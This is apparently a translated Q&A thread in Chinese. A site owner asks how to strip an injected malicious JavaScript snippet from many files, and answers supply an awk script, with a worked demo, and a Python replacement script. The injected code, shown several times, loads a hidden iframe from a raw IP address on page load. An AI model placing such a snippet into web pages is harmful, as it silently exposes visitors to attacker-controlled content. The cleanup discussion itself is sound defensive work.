我的JS文件包含此恶意代码,我希望将其删除。因此文件有多次出现。有人可以使用SED或AWK删除它吗?
if (typeof window.jsuekzis == 'undefined') {
window.jsuekzis = 1;
window.onload = function() {
var iframe = document.createElement('iframe');
iframe.style.display = "none";
iframe.src = "http://155.94.75.92/iframe.html";
document.body.appendChild(iframe);
};
}
答案 0 :(得分:2)
仅将该代码段保存在名为“ bad”的文件中,然后在受感染的文件上运行此代码(使用GNU awk进行多字符RS):
awk -v RS='^$' -v ORS= '
NR==FNR { bad=$0; lgth=length(bad); next }
s = index($0,bad) { $0 = substr($0,1,s-1) substr($0,s+lgth) }
{ print }
' bad infected
对1个受感染文件进行测试后,一旦您满意它的表现即可,您可以添加就地编辑标记(同样也是gawk)并立即在所有受感染文件上运行它:
awk -i inplace -v RS='^$' -v ORS= '
NR==FNR { bad=$0; lgth=length(bad); print; next }
s = index($0,bad) { $0 = substr($0,1,s-1) substr($0,s+lgth) }
{ print }
' bad infected1 infected2 ... infectedN
在“它不起作用”下面写上您的命令,看看它是否起作用:
$ cat bad
if (typeof window.jsuekzis == 'undefined') {
window.jsuekzis = 1;
window.onload = function() {
var iframe = document.createElement('iframe');
iframe.style.display = "none";
iframe.src = "http://155.94.75.92/iframe.html";
document.body.appendChild(iframe);
};
}
$ cat infected
foo
if (typeof window.jsuekzis == 'undefined') {
window.jsuekzis = 1;
window.onload = function() {
var iframe = document.createElement('iframe');
iframe.style.display = "none";
iframe.src = "http://155.94.75.92/iframe.html";
document.body.appendChild(iframe);
};
}
bar
$ awk -v RS='^$' -v ORS= '
NR==FNR { bad=$0; lgth=length(bad); next }
s = index($0,bad) { $0 = substr($0,1,s-1) substr($0,s+lgth) }
{ print }
' bad infected
foo
bar
答案 1 :(得分:1)
我建议使用Python脚本:
list_of_js_file_paths = ["/path/to/file/1","/path/to/file/2"]
for i in list_of_js_file_paths:
original = ""
with open(i,"r") as file:
original = file.read()
original = original.replace("""
<malicious_code>
""","")
with open(i,"w") as file:
file.write(original)
现在通过sudo python3 yourpythonfile.py